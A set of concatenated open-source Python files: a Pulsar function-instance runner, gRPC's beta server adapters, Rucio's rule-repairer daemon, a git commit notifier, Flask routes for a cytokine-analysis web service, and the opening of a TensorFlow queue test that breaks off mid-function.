if not consumer_conf.serdeClassName:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), consumer_conf.serdeClassName)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
if consumer_conf.isRegexPattern:
self.consumers[topic] = self.pulsar_client.subscribe(
re.compile(str(topic)), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
else:
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client,
self.user_code, self.consumers,
self.secrets_provider, self.metrics_labels)
# Now launch a thread that does execution
self.execution_thread = threading.Thread(target=self.actual_execution)
self.execution_thread.start()
# start proccess spawner health check timer
self.last_health_check_ts = time.time()
if self.expected_healthcheck_interval > 0:
Timer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer).start()
def actual_execution(self):
Log.debug("Started Thread for executing the function")
while True:
try:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
Log.debug("Got a message from topic %s" % msg.topic)
# deserialize message
input_object = msg.serde.deserialize(msg.message.data())
# set current message in context
self.contextimpl.set_current_message_context(msg.message, msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
successfully_executed = False
try:
# get user function start time for statistic calculation
self.stats.set_last_invocation(time.time())
# start timer for process time
self.stats.process_time_start()
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
# stop timer for process time
self.stats.process_time_end()
except Exception as e:
Log.exception("Exception while executing user method")
self.stats.incr_total_user_exceptions(e)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
self.stats.incr_total_processed_successfully()
except Exception as e:
Log.error("Uncaught exception in Python instance: %s" % e);
self.stats.incr_total_sys_exceptions(e)
def done_producing(self, consumer, orig_message, result, sent_message):
if result == pulsar.Result.Ok and self.auto_ack and self.atleast_once:
consumer.acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None and self.instance_config.function_details.sink.topic != None and \
len(self.instance_config.function_details.sink.topic) > 0:
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
# serialize function output
output_bytes = self.output_serde.serialize(output)
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64ify(msg.message.message_id().serialize())}
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message), properties=props)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName != None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic != None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.debug("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_max_publish_delay_ms=1,
max_pending_messages=100000)
def message_listener(self, serde, consumer, message):
# increment number of received records from source
self.stats.incr_total_received()
item = InternalMessage(message, consumer.topic(), serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
total_received_1min = self.stats.get_total_received_1min()
total_processed_successfully_1min = self.stats.get_total_processed_successfully_1min()
total_user_exceptions_1min = self.stats.get_total_user_exceptions_1min()
total_sys_exceptions_1min = self.stats.get_total_sys_exceptions_1min()
avg_process_latency_ms_1min = self.stats.get_avg_process_latency_1min()
metrics_data = InstanceCommunication_pb2.MetricsData()
# total metrics
metrics_data.receivedTotal = int(total_received) if sys.version_info.major >= 3 else long(total_received)
metrics_data.processedSuccessfullyTotal = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
metrics_data.systemExceptionsTotal = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
metrics_data.userExceptionsTotal = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
metrics_data.avgProcessLatency = avg_process_latency_ms
metrics_data.lastInvocation = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
# 1min metrics
metrics_data.receivedTotal_1min = int(total_received_1min) if sys.version_info.major >= 3 else long(total_received_1min)
metrics_data.processedSuccessfullyTotal_1min = int(
total_processed_successfully_1min) if sys.version_info.major >= 3 else long(total_processed_successfully_1min)
metrics_data.systemExceptionsTotal_1min = int(total_sys_exceptions_1min) if sys.version_info.major >= 3 else long(
total_sys_exceptions_1min)
metrics_data.userExceptionsTotal_1min = int(total_user_exceptions_1min) if sys.version_info.major >= 3 else long(
total_user_exceptions_1min)
metrics_data.avgProcessLatency_1min = avg_process_latency_ms_1min
# get any user metrics
user_metrics = self.contextimpl.get_metrics()
for metric_name, value in user_metrics.items():
metrics_data.userMetrics[metric_name] = value
return metrics_data
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
status.numReceived = int(total_received) if sys.version_info.major >= 3 else long(total_received)
status.numSuccessfullyProcessed = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
status.numUserExceptions = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
status.instanceId = self.instance_config.instance_id
for ex, tm in self.stats.latest_user_exception:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
for ex, tm in self.stats.latest_sys_exception:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.averageLatency = avg_process_latency_ms
status.lastInvocationTime = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.execution_thread.join()
|
_server_adaptations.py | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Translates gRPC's server-side API into gRPC's server-side Beta API."""
import collections
import threading
import grpc
from grpc import _common
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import stream
from grpc.framework.interfaces.face import face
_DEFAULT_POOL_SIZE = 8
class _ServerProtocolContext(interfaces.GRPCServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def peer(self):
return self._servicer_context.peer()
def disable_next_response_compression(self):
pass # TODO(https://github.com/grpc/grpc/issues/4078): design, implement.
class _FaceServicerContext(face.ServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def is_active(self):
return self._servicer_context.is_active()
def time_remaining(self):
return self._servicer_context.time_remaining()
def add_abortion_callback(self, abortion_callback):
raise NotImplementedError(
'add_abortion_callback no longer supported server-side!')
def cancel(self):
self._servicer_context.cancel()
def protocol_context(self):
return _ServerProtocolContext(self._servicer_context)
def invocation_metadata(self):
return _common.cygrpc_metadata(
self._servicer_context.invocation_metadata())
def initial_metadata(self, initial_metadata):
self._servicer_context.send_initial_metadata(initial_metadata)
def terminal_metadata(self, terminal_metadata):
self._servicer_context.set_terminal_metadata(terminal_metadata)
def code(self, code):
self._servicer_context.set_code(code)
def details(self, details):
self._servicer_context.set_details(details)
def _adapt_unary_request_inline(unary_request_inline):
def adaptation(request, servicer_context):
return unary_request_inline(request,
_FaceServicerContext(servicer_context))
return adaptation
def _adapt_stream_request_inline(stream_request_inline):
def adaptation(request_iterator, servicer_context):
return stream_request_inline(request_iterator,
_FaceServicerContext(servicer_context))
return adaptation
class _Callback(stream.Consumer):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._terminated = False
self._cancelled = False
def consume(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def terminate(self):
with self._condition:
self._terminated = True
self._condition.notify_all()
def consume_and_terminate(self, value):
with self._condition:
self._values.append(value)
self._terminated = True
self._condition.notify_all()
def cancel(self):
with self._condition:
self._cancelled = True
self._condition.notify_all()
def draw_one_value(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._values:
return self._values.pop(0)
elif self._terminated:
return None
else:
self._condition.wait()
def draw_all_values(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._terminated:
all_values = tuple(self._values)
self._values = None
return all_values
else:
self._condition.wait()
def _run_request_pipe_thread(request_iterator, request_consumer,
servicer_context):
thread_joined = threading.Event()
def pipe_requests():
for request in request_iterator:
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.consume(request)
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.terminate()
def stop_request_pipe(timeout):
thread_joined.set()
request_pipe_thread = _common.CleanupThread(
stop_request_pipe, target=pipe_requests)
request_pipe_thread.start()
def _adapt_unary_unary_event(unary_unary_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_unary_event(request, callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
return callback.draw_all_values()[0]
return adaptation
def _adapt_unary_stream_event(unary_stream_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_stream_event(request, callback,
_FaceServicerContext(servicer_context))
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
def _adapt_stream_unary_event(stream_unary_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_unary_event(
callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
return callback.draw_all_values()[0]
return adaptation
def _adapt_stream_stream_event(stream_stream_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_stream_event(
callback, _FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
class _SimpleMethodHandler(
collections.namedtuple('_MethodHandler', (
'request_streaming',
'response_streaming',
'request_deserializer',
'response_serializer',
'unary_unary',
'unary_stream',
'stream_unary',
'stream_stream',)), grpc.RpcMethodHandler):
pass
def _simple_method_handler(implementation, request_deserializer,
response_serializer):
if implementation.style is style.Service.INLINE:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_request_inline(implementation.unary_unary_inline),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_request_inline(implementation.unary_stream_inline),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_request_inline(
implementation.stream_unary_inline),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_request_inline(
implementation.stream_stream_inline))
elif implementation.style is style.Service.EVENT:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_unary_event(implementation.unary_unary_event),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_stream_event(implementation.unary_stream_event),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(
True, False, request_deserializer, response_serializer, None,
None,
_adapt_stream_unary_event(implementation.stream_unary_event),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_stream_event(implementation.stream_stream_event))
def _flatten_method_pair_map(method_pair_map):
method_pair_map = method_pair_map or {}
flat_map = {}
for method_pair in method_pair_map:
method = _common.fully_qualified_method(method_pair[0], method_pair[1])
flat_map[method] = method_pair_map[method_pair]
return flat_map
class _GenericRpcHandler(grpc.GenericRpcHandler):
def __init__(self, method_implementations, multi_method_implementation,
request_deserializers, response_serializers):
self._method_implementations = _flatten_method_pair_map(
method_implementations)
self._request_deserializers = _flatten_method_pair_map(
request_deserializers)
self._response_serializers = _flatten_method_pair_map(
response_serializers)
self._multi_method_implementation = multi_method_implementation
def service(self, handler_call_details):
method_implementation = self._method_implementations.get(
handler_call_details.method)
if method_implementation is not None:
return _simple_method_handler(
method_implementation,
self._request_deserializers.get(handler_call_details.method),
self._response_serializers.get(handler_call_details.method))
elif self._multi_method_implementation is None:
return None
else:
try:
return None #TODO(nathaniel): call the multimethod.
except face.NoSuchMethodError:
return None
class _Server(interfaces.Server):
def __init__(self, server):
self._server = server
def add_insecure_port(self, address):
return self._server.add_insecure_port(address)
def add_secure_port(self, address, server_credentials):
return self._server.add_secure_port(address, server_credentials)
def start(self):
self._server.start()
def stop(self, grace):
return self._server.stop(grace)
def __enter__(self):
self._server.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._server.stop(None)
return False
def server(service_implementations, multi_method_implementation,
request_deserializers, response_serializers, thread_pool,
thread_pool_size):
generic_rpc_handler = _GenericRpcHandler(
service_implementations, multi_method_implementation,
request_deserializers, response_serializers)
if thread_pool is None:
effective_thread_pool = logging_pool.pool(_DEFAULT_POOL_SIZE
if thread_pool_size is None
else thread_pool_size)
else:
effective_thread_pool = thread_pool
return _Server(
grpc.server(
effective_thread_pool, handlers=(generic_rpc_handler,)))
|
repairer.py | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2014-2015
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
#
# PY3K COMPATIBLE
"""
Judge-Repairer is a daemon to repair stuck replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import repair_rule, get_stuck_rules
from rucio.core.monitor import record_counter
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_repairer(once=False):
"""
Main loop to check for STUCK replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-repairers have the correct worker number on the next try
executable = 'judge-repairer'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
# Select a bunch of rules for this worker to repair
rules = get_stuck_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
delta=-1 if once else 1800,
limit=100,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_repairer[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_repairer[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule_id in rules:
rule_id = rule_id[0]
logging.info('rule_repairer[%s/%s]: Repairing rule %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
if graceful_stop.is_set():
break
try:
start = time.time()
repair_rule(rule_id=rule_id)
logging.debug('rule_repairer[%s/%s]: repairing of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
logging.warning('rule_repairer[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Repairer threads.
"""
executable = 'judge-repairer'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_repairer(once)
else:
logging.info('Repairer starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_repairer, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
main.py | from notification.notification import Notification as nf
from git.git import Git
import threading
import time
branch = "master"
def worker():
number_of_commit = Git.number_of_commit(branch)
while True:
new_number_of_commit = Git.number_of_commit(branch)
if number_of_commit != new_number_of_commit:
number_of_commit = new_number_of_commit
notification = nf()
notification.rise(title='New commit',
subtitle=Git.get_last_commit_author(branch),
message=Git.get_last_commit_message(branch))
time.sleep(30)
if __name__ == '__main__':
t = threading.Thread(name='worker', target=worker)
t.start() |
routes.py | from flask import render_template, request
from werkzeug.utils import secure_filename
from app import app
import logging
import sys
import os
import pandas as pd
import json
import uuid
import flask_executor
import threading
from app.backend import server_tools, tools
UPLOAD_FOLDER = sys.path.append(os.path.join(os.getcwd(), 'cytomod', 'data_files', 'data'))
ALLOWED_EXTENSIONS = {'xlsx', 'xls'}
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
executor = flask_executor.Executor(app)
@app.route('/upload', methods=['POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
name = request.form.get('name_data')
id = {'id': uuid.uuid1(),
'status': 'PENDING',
'message': 'pending job'}
if name != '':
project_name = name
tools.create_folder(os.path.join('static/', id['id'].__str__()))
tools.create_folder(os.path.join('static/', id['id'].__str__(), 'data_files'))
tools.write_DF_to_excel(os.path.join('static/', id['id'].__str__(), 'process_id_status.xlsx'),
id)
else:
return json.dumps({ "error": 'cant access the server without a name' }), 403
if 'patients' in request.files:
patients = request.files['patients']
else:
patients = None
if 'cytokines' not in request.files:
return json.dumps({ "error": 'no cytokine file was found' }), 400
cytokines = request.files['cytokines']
# if user does not select file
if cytokines.filename == '':
return json.dumps({ "error": 'no cytokine file was found' }), 400
if patients != None:
if allowed_file(patients.filename):
filename = secure_filename(patients.filename)
patients.save(os.path.join(os.path.join(os.getcwd(), 'static', id['id'].__str__(), 'data_files'), filename))
if cytokines and allowed_file(cytokines.filename):
filename = secure_filename(cytokines.filename)
cytokines.save(os.path.join(os.path.join(os.getcwd(), 'static', id['id'].__str__(), 'data_files'), filename))
if patients != None:
files = pd.DataFrame([secure_filename(cytokines.filename), secure_filename(patients.filename), project_name])
tools.write_DF_to_excel(os.path.join('static/', id['id'].__str__(), 'data_files_and_project_names.xlsx'), files)
return {'id': id['id'],
'outcomes': True}
else:
files = pd.DataFrame([secure_filename(cytokines.filename), "no file", project_name])
tools.write_DF_to_excel(os.path.join('static/', id['id'].__str__(), 'data_files_and_project_names.xlsx'), files)
return {'id': id['id'],
'outcomes': False}
else:
return json.dumps({"error": 'no cytokine file was found' }), 400
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/status', methods=['POST'])
def method_status():
id = request.form.get('id')
if not os.path.exists(os.path.join('static', id, 'process_id_status.xlsx')):
return {'status': 'RUN TIME ERROR',
'message': 'project was deleted due to server internal error, please try again'}
statuses = tools.read_excel(os.path.join('static/', id, 'process_id_status.xlsx'))
status = statuses['value'][1]
message = statuses['value'][2]
return {'status': status,
'message': message}
@app.route('/generate', methods=['POST'])
def generate():
logging.info(f'got a request {request.form}')
name = request.form.get('name_data')
if name == '':
return json.dumps({"error": 'please insert your data and project name'}), 400
id = request.form.get('id')
if id not in os.listdir('static'):
logging.warning(f'invalid id {id}, returning error')
return json.dumps({"error": 'invalid name'}), 400
id = {'id': id,
'status': 'PENDING'}
luminex = request.form.get('luminex') in ['true', '1', 'True', 'TRUE', 'on']
log_transform = request.form.get('log_transform') in ['true', '1', 'True', 'TRUE', 'on']
outcomes = request.form.get('outcomes')
covariates = request.form.get('covariates') # names of regression covariates to control for
log_column_names = request.form.get('log_column_names')
cytokines = request.form.get('cytokines', default='') # if none, will analyze all
parameters = [name, id, request.form.get('name_compartment', default='Plasma'), luminex, log_transform, request.form.get('max_testing_k', type=int, default=6),
False, outcomes.split(", "), covariates.split(", "), log_column_names.split(", ") , cytokines.split(", ")
]
method = threading.Thread(target=server_tools.run_server, args=(parameters))
method.daemon = True
method.start()
logging.info(f'Tread {method.name} started running and calculating the method')
return {'id': id}
@app.route('/results' , methods=['POST'])
def results():
id = request.form.get('id')
dir = os.listdir('static')
if id not in dir:
logging.warning(f'invalid id {id}, not found in {dir} returning error')
return json.dumps({"error": 'invalid name'}), 400
# todo: add check for file existence
results = server_tools.encode_images(id)
if results is None:
logging.warning(f'invalid id {id}, not found in {dir} returning error')
return json.dumps({"error": 'invalid name'}), 400
return results.to_json()
# if __name__ == "__main__":
# app.run(ssl_context=('cert.pem', 'key.pem')) |
random_shuffle_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
